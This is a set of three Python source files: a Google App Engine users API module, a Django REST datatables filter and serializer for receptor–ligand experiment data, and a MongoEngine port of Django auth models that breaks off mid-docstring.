from google.appengine.api import apiproxy_stub_map
from google.appengine.api import user_service_pb
from google.appengine.runtime import apiproxy_errors
class Error(Exception):
"""Base User error type."""
class UserNotFoundError(Error):
"""No email argument was specified, and no user is logged in."""
class RedirectTooLongError(Error):
"""The generated redirect URL was too long."""
class NotAllowedError(Error):
"""The requested redirect URL is not allowed."""
class User(object):
"""Provides the email address, nickname, and ID for a user.
A nickname is a human-readable string that uniquely identifies a Google user,
akin to a username. For some users, this nickname is an email address, but for
other users, a different nickname is used.
A user is a Google Accounts user.
`federated_identity` and `federated_provider` are decommissioned and should
not be used.
"""
__user_id = None
__federated_identity = None
__federated_provider = None
def __init__(self, email=None, _auth_domain=None,
_user_id=None, federated_identity=None, federated_provider=None,
_strict_mode=True):
"""Constructor.
Args:
email: An optional string of the user's email address. It defaults to
the current user's email address.
federated_identity: Decommissioned, don't use.
federated_provider: Decommissioned, don't use.
Raises:
UserNotFoundError: If the user is not logged in and both `email` and
`federated_identity` are empty.
"""
if _auth_domain is None:
_auth_domain = os.environ.get('AUTH_DOMAIN')
assert _auth_domain
if email is None and federated_identity is None:
email = os.environ.get('USER_EMAIL', email)
_user_id = os.environ.get('USER_ID', _user_id)
federated_identity = os.environ.get('FEDERATED_IDENTITY',
federated_identity)
federated_provider = os.environ.get('FEDERATED_PROVIDER',
federated_provider)
if email is None:
email = ''
if not email and not federated_identity and _strict_mode:
raise UserNotFoundError
self.__email = email
self.__federated_identity = federated_identity
self.__federated_provider = federated_provider
self.__auth_domain = _auth_domain
self.__user_id = _user_id or None
def nickname(self):
"""Returns the user's nickname.
The nickname will be a unique, human-readable identifier for this user with
respect to this application. It will be an email address for some users,
and part of the email address for others.
Returns:
The nickname of the user as a string.
"""
if (self.__email and self.__auth_domain and
self.__email.endswith('@' + self.__auth_domain)):
suffix_len = len(self.__auth_domain) + 1
return self.__email[:-suffix_len]
elif self.__federated_identity:
return self.__federated_identity
else:
return self.__email
def email(self):
"""Returns the user's email address."""
return self.__email
def user_id(self):
"""Obtains the user ID of the user.
Returns:
A permanent unique identifying string or `None`. If the email address was
set explicitly, this will return `None`.
"""
return self.__user_id
def auth_domain(self):
"""Obtains the user's authentication domain.
Returns:
A string containing the authentication domain. This method is internal and
should not be used by client applications.
"""
return self.__auth_domain
def federated_identity(self):
"""Decommissioned, don't use.
Returns:
A string containing the federated identity of the user. If the user is not
a federated user, `None` is returned.
"""
return self.__federated_identity
def federated_provider(self):
"""Decommissioned, don't use.
Returns:
A string containing the federated provider. If the user is not a federated
user, `None` is returned.
"""
return self.__federated_provider
def __unicode__(self):
return unicode(self.nickname())
def __str__(self):
return str(self.nickname())
def __repr__(self):
values = []
if self.__email:
values.append("email='%s'" % self.__email)
if self.__federated_identity:
values.append("federated_identity='%s'" % self.__federated_identity)
if self.__user_id:
values.append("_user_id='%s'" % self.__user_id)
return 'users.User(%s)' % ','.join(values)
def __hash__(self):
if self.__federated_identity:
return hash((self.__federated_identity, self.__auth_domain))
else:
return hash((self.__email, self.__auth_domain))
def __cmp__(self, other):
if not isinstance(other, User):
return NotImplemented
if self.__federated_identity:
return cmp((self.__federated_identity, self.__auth_domain),
(other.__federated_identity, other.__auth_domain))
else:
return cmp((self.__email, self.__auth_domain),
(other.__email, other.__auth_domain))
def create_login_url(dest_url=None, _auth_domain=None,
federated_identity=None):
"""Computes the login URL for redirection.
Args:
dest_url: String that is the desired final destination URL for the user
once login is complete. If `dest_url` does not specify a host, the host
from the current request is used.
federated_identity: Decommissioned, don't use. Setting this to a non-None
value raises a NotAllowedError.
Returns:
Login URL as a string. The login URL will use Google Accounts.
Raises:
NotAllowedError: If federated_identity is not None.
"""
req = user_service_pb.CreateLoginURLRequest()
resp = user_service_pb.CreateLoginURLResponse()
if dest_url:
req.set_destination_url(dest_url)
else:
req.set_destination_url('')
if _auth_domain:
req.set_auth_domain(_auth_domain)
if federated_identity:
raise NotAllowedError('OpenID 2.0 support is decommissioned')
try:
apiproxy_stub_map.MakeSyncCall('user', 'CreateLoginURL', req, resp)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
user_service_pb.UserServiceError.REDIRECT_URL_TOO_LONG):
raise RedirectTooLongError
elif (e.application_error ==
user_service_pb.UserServiceError.NOT_ALLOWED):
raise NotAllowedError
else:
raise e
return resp.login_url()
CreateLoginURL = create_login_url
def create_logout_url(dest_url, _auth_domain=None):
"""Computes the logout URL and specified destination URL for the request.
This function works for Google Accounts applications.
Args:
dest_url: String that is the desired final destination URL for the user
after the user has logged out. If `dest_url` does not specify a host,
the host from the current request is used.
Returns:
Logout URL as a string.
"""
req = user_service_pb.CreateLogoutURLRequest()
resp = user_service_pb.CreateLogoutURLResponse()
req.set_destination_url(dest_url)
if _auth_domain:
req.set_auth_domain(_auth_domain)
try:
apiproxy_stub_map.MakeSyncCall('user', 'CreateLogoutURL', req, resp)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
user_service_pb.UserServiceError.REDIRECT_URL_TOO_LONG):
raise RedirectTooLongError
else:
raise e
return resp.logout_url()
CreateLogoutURL = create_logout_url
def get_current_user():
"""Retrieves information associated with the user that is making a request.
Returns:
A `User` instance for the user making the request, or `None` if no user
is signed in.
"""
try:
return User()
except UserNotFoundError:
return None
GetCurrentUser = get_current_user
def is_current_user_admin():
"""Specifies whether the user making a request is an application admin.
Because administrator status is not persisted in the datastore,
`is_current_user_admin()` is a separate function rather than a member function
of the `User` class. The status only exists for the user making the current
request.
Returns:
`True` if the user is an administrator; all other user types return `False`.
"""
return (os.environ.get('USER_IS_ADMIN', '0')) == '1'
IsCurrentUserAdmin = is_current_user_admin
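# Hedged request-handler sketch (assumes the Python 2 App Engine runtime this
# module targets; handler wiring is illustrative):
#
#   user = get_current_user()
#   if user:
#       body = 'Hello, %s' % user.nickname()
#   else:
#       body = 'Please <a href="%s">sign in</a>.' % create_login_url('/')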
| |
from django.db.models import IntegerField, FloatField
from django.db.models.functions import Cast
from django_filters import filters
from rest_framework_datatables.django_filters.filterset import DatatablesFilterSet
from rest_framework import serializers
from .models import AnalyzedExperiment
class AnalyzedExperimentFilter(DatatablesFilterSet):
class_ = filters.CharFilter(
field_name='receptor__family__parent__parent__parent_id',
method='yadcf_multiple_choices_query', required=False
)
receptor_family = filters.CharFilter(
field_name='receptor__family__parent_id',
method='yadcf_multiple_choices_query', required=False
)
uniprot = filters.CharFilter(
field_name='receptor_id',
method='yadcf_multiple_choices_query', required=False
)
iuphar = filters.CharFilter(
field_name='receptor_id',
method='yadcf_multiple_choices_query', required=False
)
species = filters.CharFilter(
field_name='receptor__species_id',
method='yadcf_multiple_choices_query', required=False
)
endogenous_ligand = filters.CharFilter(
field_name="endogenous_ligand_id",
method='yadcf_multiple_choices_query', required=False
)
reference_ligand = filters.CharFilter(
field_name="reference_ligand_id",
method='yadcf_multiple_choices_query', required=False
)
ligand = filters.CharFilter(
field_name="ligand_id",
method='yadcf_multiple_choices_query', required=False
)
# We need to fix ordering for this field.
vendor_quantity = filters.CharFilter(
method='yadcf_range_filter_with_integer_cast', required=False
)
article_quantity = filters.CharFilter(
method='yadcf_range_filter_with_integer_cast', required=False
)
labs_quantity = filters.CharFilter(
method='yadcf_range_filter_with_integer_cast', required=False
)
primary = filters.CharFilter(
# field_name='primary',
method='transducers_multiple_choices_filter', required=False
)
secondary = filters.CharFilter(
# field_name='primary',
method='transducers_multiple_choices_filter', required=False
)
pathways_p1 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
pathways_p2 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
pathways_p3 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
pathways_p4 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
pathways_p5 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
opmodel_p2_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
opmodel_p3_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
opmodel_p4_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
opmodel_p5_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
lbf_p2_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
lbf_p3_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
lbf_p4_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
lbf_p5_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
potency_p2_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
potency_p3_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
potency_p4_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
potency_p5_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p2 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p3 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p4 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p5 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p2 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p3 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p4 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p5 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p2 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p3 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p4 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p5 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
assay_p1 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
assay_p2 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
assay_p3 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
assay_p4 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
assay_p5 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p1 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p2 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p3 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p4 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p5 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p1 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p2 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p3 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p4 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p5 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
authors = filters.CharFilter(
field_name='publication__authors',
method='yadcf_multiple_choices_query', required=False
)
doi_reference = filters.CharFilter(
field_name='publication__web_link_id',
method='yadcf_multiple_choices_query', required=False
)
class Meta:
queryset = AnalyzedExperiment.objects.all()
fields = [
'id','class_', 'receptor_family', 'uniprot', 'iuphar', 'species', 'endogenous_ligand',
'reference_ligand', 'ligand_biased', 'vendor_quantity', 'article_quantity', 'ligand_labs',
'primary', 'secondary',
'pathways_p1', 'pathways_p2', 'pathways_p3', 'pathways_p4', 'pathways_p5',
'opmodel_p2_p1', 'opmodel_p3_p1', 'opmodel_p4_p1', 'opmodel_p5_p1',
'lbf_p2_p1', 'lbf_p3_p1', 'lbf_p4_p1', 'lbf_p5_p1',
'potency_p2_p1', 'potency_p3_p1', 'potency_p4_p1', 'potency_p5_p1',
'activity_p1', 'activity_p2', 'activity_p3', 'activity_p4', 'activity_p5',
'emax_p1', 'emax_p2', 'emax_p3', 'emax_p4', 'emax_p5',
'tfactor_p1', 'tfactor_p2', 'tfactor_p3', 'tfactor_p4', 'tfactor_p5',
'assay_p1', 'assay_p2', 'assay_p3', 'assay_p4', 'assay_p5',
'cell_p1', 'cell_p2', 'cell_p3', 'cell_p4', 'cell_p5',
'time_p1', 'time_p2', 'time_p3', 'time_p4', 'time_p5',
'authors', 'doi_reference','ligand_id','publication_link','quality_activity_p1',
'quality_activity_p2','quality_activity_p3','quality_activity_p4','quality_activity_p5',
'standard_type_p1','standard_type_p2','standard_type_p3','standard_type_p4','standard_type_p5',
'ligand_source_id','ligand_source_type'
]
read_only_fields = fields
@staticmethod
def yadcf_range_filter_with_integer_cast(queryset, field_name, value):
min_value, max_value = value.split('-yadcf_delim-')
try:
min_value = float(min_value)
except ValueError:
min_value = None
try:
max_value = float(max_value)
except ValueError:
max_value = None
queryset = queryset.annotate(**{f'{field_name}_as_integer': Cast(field_name, IntegerField())})
if min_value is not None:
queryset = queryset.filter(**{f'{field_name}_as_integer__gte': min_value})
if max_value is not None:
queryset = queryset.filter(**{f'{field_name}_as_integer__lte': max_value})
return queryset
@staticmethod
def yadcf_range_filter_with_float_cast(queryset, field_name, value):
min_value, max_value = value.split('-yadcf_delim-')
try:
min_value = float(min_value)
except ValueError:
min_value = None
try:
max_value = float(max_value)
except ValueError:
max_value = None
queryset = queryset.annotate(**{f'{field_name}_as_float': Cast(field_name, FloatField())})
if field_name in ['lbf_p2_p1', 'lbf_p3_p1', 'lbf_p4_p1', 'lbf_p5_p1']:
# TODO: come up with numeric values for these categorical labels:
queryset = queryset.exclude(
**{f'{field_name}__in': ['High Bias', 'Full Bias', 'Low Bias','']}
)
if min_value is not None:
queryset = queryset.filter(**{f'{field_name}_as_float__gte': min_value})
if max_value is not None:
queryset = queryset.filter(**{f'{field_name}_as_float__lte': max_value})
return queryset
@staticmethod
def yadcf_range_filter(queryset, field_name, value):
min_value, max_value = value.split('-yadcf_delim-')
try:
min_value = float(min_value)
except ValueError:
min_value = None
try:
max_value = float(max_value)
except ValueError:
max_value = None
if min_value is not None:
queryset = queryset.filter(**{f'{field_name}__gte': min_value})
if max_value is not None:
queryset = queryset.filter(**{f'{field_name}__lte': max_value})
return queryset
@staticmethod
def yadcf_multiple_choices_query(queryset, field_name, value):
choices = value.replace('\\', '').split('|')
return queryset.filter(**{f'{field_name}__in': choices})
@staticmethod
def transducers_multiple_choices_filter(queryset, field_name, value):
choices = value.replace('\\', '').replace('_', ' ').split('|')
return queryset.filter(**{f'{field_name}__in': choices})
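# Hedged note on the wire format these helpers expect (yadcf defaults):
# the range filters receive 'min-yadcf_delim-max' (either side may be blank
# for an open bound), e.g. '0-yadcf_delim-10'; the multiple-choice filters
# receive pipe-delimited values, e.g. 'choice1|choice2'.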
class AnalyzedExperimentSerializer(serializers.ModelSerializer):
# receptor
class_ = serializers.SerializerMethodField()
receptor_family = serializers.CharField(source='receptor.family.parent')
uniprot = serializers.SerializerMethodField()
iuphar = serializers.SerializerMethodField()
species = serializers.CharField(source='receptor.species.common_name')
endogenous_ligand = serializers.CharField()
# Ligand
reference_ligand = serializers.CharField()
ligand = serializers.CharField(source='ligand.name')
vendor_quantity = serializers.CharField()
article_quantity = serializers.CharField()
labs_quantity = serializers.CharField()
# Receptor transducers
primary = serializers.SerializerMethodField()
secondary = serializers.SerializerMethodField()
# Pathways
pathways_p1 = serializers.CharField()
pathways_p2 = serializers.CharField()
pathways_p3 = serializers.CharField()
pathways_p4 = serializers.CharField()
pathways_p5 = serializers.CharField()
# operational model
opmodel_p2_p1 = serializers.CharField()
opmodel_p3_p1 = serializers.CharField()
opmodel_p4_p1 = serializers.CharField()
opmodel_p5_p1 = serializers.CharField()
# log bias factor
lbf_p2_p1 = serializers.CharField()
lbf_p3_p1 = serializers.CharField()
lbf_p4_p1 = serializers.CharField()
lbf_p5_p1 = serializers.CharField()
# Potency ratio
potency_p2_p1 = serializers.CharField()
potency_p3_p1 = serializers.CharField()
potency_p4_p1 = serializers.CharField()
potency_p5_p1 = serializers.CharField()
quality_activity_p1 = serializers.CharField()
quality_activity_p2 = serializers.CharField()
quality_activity_p3 = serializers.CharField()
quality_activity_p4 = serializers.CharField()
quality_activity_p5 = serializers.CharField()
standard_type_p1 = serializers.CharField()
standard_type_p2 = serializers.CharField()
standard_type_p3 = serializers.CharField()
standard_type_p4 = serializers.CharField()
standard_type_p5 = serializers.CharField()
# Potency
activity_p1 = serializers.CharField()
activity_p2 = serializers.CharField()
activity_p3 = serializers.CharField()
activity_p4 = serializers.CharField()
activity_p5 = serializers.CharField()
emax_p1 = serializers.CharField()
emax_p2 = serializers.CharField()
emax_p3 = serializers.CharField()
emax_p4 = serializers.CharField()
emax_p5 = serializers.CharField()
tfactor_p1 = serializers.CharField()
tfactor_p2 = serializers.CharField()
tfactor_p3 = serializers.CharField()
tfactor_p4 = serializers.CharField()
tfactor_p5 = serializers.CharField()
assay_p1 = serializers.CharField()
assay_p2 = serializers.CharField()
assay_p3 = serializers.CharField()
assay_p4 = serializers.CharField()
assay_p5 = serializers.CharField()
cell_p1 = serializers.CharField()
cell_p2 = serializers.CharField()
cell_p3 = serializers.CharField()
cell_p4 = serializers.CharField()
cell_p5 = serializers.CharField()
time_p1 = serializers.CharField()
time_p2 = serializers.CharField()
time_p3 = serializers.CharField()
time_p4 = serializers.CharField()
time_p5 = serializers.CharField()
authors = serializers.CharField(source='publication.authors')
doi_reference = serializers.CharField(source='publication.web_link.index')
id = serializers.CharField()
ligand_id = serializers.CharField(source='ligand.id')
publication_link = serializers.CharField(source='publication.web_link')
ligand_source_id = serializers.CharField()
ligand_source_type = serializers.CharField()
class Meta:
model = AnalyzedExperiment
fields = [
'id','class_', 'receptor_family', 'uniprot', 'iuphar', 'species', 'endogenous_ligand',
'reference_ligand', 'ligand', 'vendor_quantity', 'article_quantity', 'labs_quantity',
'primary', 'secondary',
'pathways_p1', 'pathways_p2', 'pathways_p3', 'pathways_p4', 'pathways_p5',
'opmodel_p2_p1', 'opmodel_p3_p1', 'opmodel_p4_p1', 'opmodel_p5_p1',
'lbf_p2_p1', 'lbf_p3_p1', 'lbf_p4_p1', 'lbf_p5_p1',
'potency_p2_p1', 'potency_p3_p1', 'potency_p4_p1', 'potency_p5_p1',
'activity_p1', 'activity_p2', 'activity_p3', 'activity_p4', 'activity_p5',
'emax_p1', 'emax_p2', 'emax_p3', 'emax_p4', 'emax_p5',
'tfactor_p1', 'tfactor_p2', 'tfactor_p3', 'tfactor_p4', 'tfactor_p5',
'assay_p1', 'assay_p2', 'assay_p3', 'assay_p4', 'assay_p5',
'cell_p1', 'cell_p2', 'cell_p3', 'cell_p4', 'cell_p5',
'time_p1', 'time_p2', 'time_p3', 'time_p4', 'time_p5',
'authors', 'doi_reference','ligand_id', 'publication_link','quality_activity_p1',
'quality_activity_p2','quality_activity_p3','quality_activity_p4','quality_activity_p5',
'standard_type_p1','standard_type_p2','standard_type_p3','standard_type_p4','standard_type_p5',
'ligand_source_id','ligand_source_type'
]
@staticmethod
def get_class_(obj):
class_receptor = obj.receptor.family.parent.parent.parent.name
return class_receptor.replace('Class', '').strip()
@staticmethod
def get_iuphar(obj):
iuphar_name = obj.receptor.name.split(' ', 1)[0].split('-adrenoceptor', 1)[0].strip()
return iuphar_name
@staticmethod
def get_uniprot(obj):
uniprot = obj.receptor.entry_short()
return uniprot
@staticmethod
def get_primary(obj):
return obj.primary.replace(' family,', '')
@staticmethod
def get_secondary(obj):
return obj.secondary.replace(' family,', '')
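# Hedged wiring sketch (view and backend names are assumptions based on the
# django-rest-framework-datatables package, not part of this module):
#
#   from rest_framework import viewsets
#   from rest_framework_datatables.django_filters.backends import (
#       DatatablesFilterBackend)
#
#   class AnalyzedExperimentViewSet(viewsets.ReadOnlyModelViewSet):
#       queryset = AnalyzedExperiment.objects.all()
#       serializer_class = AnalyzedExperimentSerializer
#       filter_backends = [DatatablesFilterBackend]
#       filterset_class = AnalyzedExperimentFilter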
| |
from mongoengine import *
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.hashers import make_password, check_password
from django.contrib.auth.models import _user_has_perm, _user_get_all_permissions, _user_has_module_perms
from django.contrib.contenttypes.models import ContentTypeManager
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.translation import ugettext_lazy as _
try:
from django.utils.module_loading import import_module
except ImportError:
"""Handle older versions of Django"""
from django.utils.importlib import import_module
from djangome.utils import datetime_now #, make_password, check_password
REDIRECT_FIELD_NAME = 'next'
MONGOENGINE_USER_DOCUMENT = getattr(settings, 'MONGOENGINE_USER_DOCUMENT', 'djangome.mongo_auth.models.User')
__all__ = (
'get_user_document',
)
def get_user_document():
"""Get the user document class used for authentication.
This is the class defined in settings.MONGOENGINE_USER_DOCUMENT, which
defaults to `djangome.mongo_auth.models.User`.
"""
name = MONGOENGINE_USER_DOCUMENT
dot = name.rindex('.')
module = import_module(name[:dot])
return getattr(module, name[dot + 1:])
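# Hedged example (dotted path illustrative): in settings.py set
#   MONGOENGINE_USER_DOCUMENT = 'myapp.documents.CustomUser'
# and resolve the class at call time with:
#   UserDocument = get_user_document()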
class SiteProfileNotAvailable(Exception):
pass
class ContentType(Document):
name = StringField(max_length=100)
app_label = StringField(max_length=100)
model = StringField(max_length=100, verbose_name=_('python model class name'),
unique_with='app_label')
objects = ContentTypeManager()
class Meta:
verbose_name = _('content type')
verbose_name_plural = _('content types')
# db_table = 'django_content_type'
# ordering = ('name',)
# unique_together = (('app_label', 'model'),)
def __unicode__(self):
return self.name
def model_class(self):
"""Returns the Python model class for this type of content."""
from django.db import models
return models.get_model(self.app_label, self.model)
def get_object_for_this_type(self, **kwargs):
"""
Returns an object of this type for the keyword arguments given.
Basically, this is a proxy around this object_type's get_object() model
method. The ObjectNotExist exception, if thrown, will not be caught,
so code that calls this method should catch it.
"""
return self.model_class()._default_manager.using(self._state.db).get(**kwargs)
def natural_key(self):
return (self.app_label, self.model)
class PermissionManager(models.Manager):
def get_by_natural_key(self, codename, app_label, model):
return self.get(
codename=codename,
content_type=ContentType.objects.get_by_natural_key(app_label, model)
)
class Permission(Document):
"""The permissions system provides a way to assign permissions to specific
users and groups of users.
The permission system is used by the Django admin site, but may also be
useful in your own code. The Django admin site uses permissions as follows:
- The "add" permission limits the user's ability to view the "add"
form and add an object.
- The "change" permission limits a user's ability to view the change
list, view the "change" form and change an object.
- The "delete" permission limits the ability to delete an object.
Permissions are set globally per type of object, not per specific object
instance. It is possible to say "Mary may change news stories," but it's
not currently possible to say "Mary may change news stories, but only the
ones she created herself" or "Mary may only change news stories that have
a certain status or publication date."
Three basic permissions -- add, change and delete -- are automatically
created for each Django model.
"""
name = StringField(max_length=50, verbose_name=_('name'))
content_type = ReferenceField(ContentType)
codename = StringField(max_length=100, verbose_name=_('codename'))
# FIXME: don't access field of the other class
# unique_with=['content_type__app_label', 'content_type__model'])
objects = PermissionManager()
class Meta:
verbose_name = _('permission')
verbose_name_plural = _('permissions')
# unique_together = (('content_type', 'codename'),)
# ordering = ('content_type__app_label', 'content_type__model', 'codename')
def __unicode__(self):
return u"%s | %s | %s" % (
unicode(self.content_type.app_label),
unicode(self.content_type),
unicode(self.name))
def natural_key(self):
return (self.codename,) + self.content_type.natural_key()
natural_key.dependencies = ['contenttypes.contenttype']
class Group(Document):
"""Groups are a generic way of categorizing users to apply permissions,
or some other label, to those users. A user can belong to any number of
groups.
A user in a group automatically has all the permissions granted to that
group. For example, if the group Site editors has the permission
can_edit_home_page, any user in that group will have that permission.
Beyond permissions, groups are a convenient way to categorize users to
apply some label, or extended functionality, to them. For example, you
could create a group 'Special users', and you could write code that would
do special things to those users -- such as giving them access to a
members-only portion of your site, or sending them members-only
e-mail messages.
"""
name = StringField(max_length=80, unique=True, verbose_name=_('name'))
permissions = ListField(ReferenceField(Permission, verbose_name=_('permissions'), required=False))
class Meta:
verbose_name = _('group')
verbose_name_plural = _('groups')
def __unicode__(self):
return self.name
class UserManager(models.Manager):
def create_user(self, username, email, password=None):
"""
Creates and saves a User with the given username, e-mail and password.
"""
now = datetime_now()
# Normalize the address by lowercasing the domain part of the email
# address.
try:
email_name, domain_part = email.strip().split('@', 1)
except ValueError:
pass
else:
email = '@'.join([email_name, domain_part.lower()])
user = self.model(username=username, email=email, is_staff=False,
is_active=True, is_superuser=False, last_login=now,
date_joined=now)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, username, email, password):
u = self.create_user(username, email, password)
u.is_staff = True
u.is_active = True
u.is_superuser = True
u.save(using=self._db)
return u
def make_random_password(self, length=10, allowed_chars='abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789'):
"Generates a random password with the given length and given allowed_chars"
# Note that default value of allowed_chars does not have "I" or letters
# that look like it -- just to avoid confusion.
from random import choice
return ''.join([choice(allowed_chars) for i in range(length)])
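    # Illustrative usage (hypothetical output): make_random_password(length=8)
    # might return 'kT3npQ9w'; ambiguous characters such as I, l, O, 0 and 1 are
    # deliberately absent from the default allowed_chars.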
class User(Document):
"""A User document that aims to mirror most of the API specified by Django
at http://docs.djangoproject.com/en/dev/topics/auth/#users
"""
username = StringField(max_length=30, required=True,
verbose_name=_('username'),
help_text=_("Required. 30 characters or fewer. Letters, numbers and @/./+/-/_ characters"))
first_name = StringField(max_length=30,
verbose_name=_('first name'))
last_name = StringField(max_length=30,
verbose_name=_('last name'))
email = EmailField(verbose_name=_('e-mail address'))
password = StringField(max_length=128,
verbose_name=_('password'),
help_text=_("Use '[algo]$[iterations]$[salt]$[hexdigest]' or use the <a href=\"password/\">change password form</a>."))
is_staff = BooleanField(default=False,
verbose_name=_('staff status'),
help_text=_("Designates whether the user can log into this admin site."))
is_active = BooleanField(default=True,
verbose_name=_('active'),
help_text=_("Designates whether this user should be treated as active. Unselect this instead of deleting accounts."))
is_superuser = BooleanField(default=False,
verbose_name=_('superuser status'),
help_text=_("Designates that this user has all permissions without explicitly assigning them."))
last_login = DateTimeField(default=datetime_now,
verbose_name=_('last login'))
date_joined = DateTimeField(default=datetime_now,
verbose_name=_('date joined'))
user_permissions = ListField(ReferenceField(Permission), verbose_name=_('user permissions'),
help_text=_('Permissions for the user.'))
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
meta = {
'allow_inheritance': True,
'indexes': [
{'fields': ['username'], 'unique': True, 'sparse': True}
]
}
def __unicode__(self):
return self.username
def get_full_name(self):
"""Returns the users first and last names, separated by a space.
"""
full_name = u'%s %s' % (self.first_name or '', self.last_name or '')
return full_name.strip()
def is_anonymous(self):
return False
def is_authenticated(self):
return True
def set_password(self, raw_password):
"""Sets the user's password - always use this rather than directly
assigning to :attr:`~django_me.auth.User.password` as the
password is hashed before storage.
"""
self.password = make_password(raw_password)
self.save()
return self
def check_password(self, raw_password):
"""Checks the user's password against a provided password - always use
this rather than directly comparing to
:attr:`~django_me.auth.User.password` as the password is
hashed before storage.
"""
return check_password(raw_password, self.password)
@classmethod
def create_user(cls, username, password, email=None):
"""Create (and save) a new user with the given username, password and
email address.
"""
now = datetime_now()
# Normalize the address by lowercasing the domain part of the email
# address.
if email is not None:
try:
email_name, domain_part = email.strip().split('@', 1)
except ValueError:
pass
else:
email = '@'.join([email_name, domain_part.lower()])
user = cls(username=username, email=email, date_joined=now)
user.set_password(password)
user.save()
return user
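    # Illustrative usage (hypothetical values): User.create_user('bob', 's3cret',
    # email='Bob@Example.COM') stores the email as 'Bob@example.com'; only the
    # domain part is lowercased, mirroring UserManager.create_user above.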
def get_group_permissions(self, obj=None):
"""
Returns a list of permission strings that this user has through his/her
groups. This method queries all available auth backends. If an object
is passed in, only permissions matching this object are returned.
"""
permissions = set()
for backend in auth.get_backends():
if hasattr(backend, "get_group_permissions"):
permissions.update(backend.get_group_permissions(self, obj))
return permissions
def get_all_permissions(self, obj=None):
return _user_get_all_permissions(self, obj)
def has_perm(self, perm, obj=None):
"""
Returns True if the user has the specified permission. This method
queries all available auth backends, but returns immediately if any
backend returns True. Thus, a user who has permission from a single
auth backend is assumed to have permission in general. If an object is
provided, permissions for this specific object are checked.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
# Otherwise we need to check the backends.
return _user_has_perm(self, perm, obj)
def has_module_perms(self, app_label):
"""
Returns True if the user has any permissions in the given app label.
Uses pretty much the same logic as has_perm, above.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
return _user_has_module_perms(self, app_label)
def email_user(self, subject, message, from_email=None):
"Sends an e-mail to this User."
from django.core.mail import send_mail
send_mail(subject, message, from_email, [self.email])
def get_profile(self):
"""
Returns site-specific profile for this user. Raises
SiteProfileNotAvailable if this site does not allow profiles.
"""
if not hasattr(self, '_profile_cache'):
from django.conf import settings
if not getattr(settings, 'AUTH_PROFILE_MODULE', False):
raise SiteProfileNotAvailable('You need to set AUTH_PROFILE_MO'
'DULE in your project settings')
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
except ValueError:
raise SiteProfileNotAvailable('app_label and model_name should'
' be separated by a dot in the AUTH_PROFILE_MODULE set'
'ting')
try:
model = models.get_model(app_label, model_name)
if model is None:
raise SiteProfileNotAvailable('Unable to load the profile '
'model, check AUTH_PROFILE_MODULE in your project sett'
'ings')
self._profile_cache = model._default_manager.using(self._state.db).get(user__id__exact=self.id)
self._profile_cache.user = self
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
return self._profile_cache
class MongoUserManager(UserManager):
"""A User manager wich allows the use of MongoEngine documents in Django.
To use the manager, you must tell django.contrib.auth to use MongoUser as
the user model. In you settings.py, you need:
INSTALLED_APPS = (
...
'django.contrib.auth',
'django_me.mongo_auth',
...
)
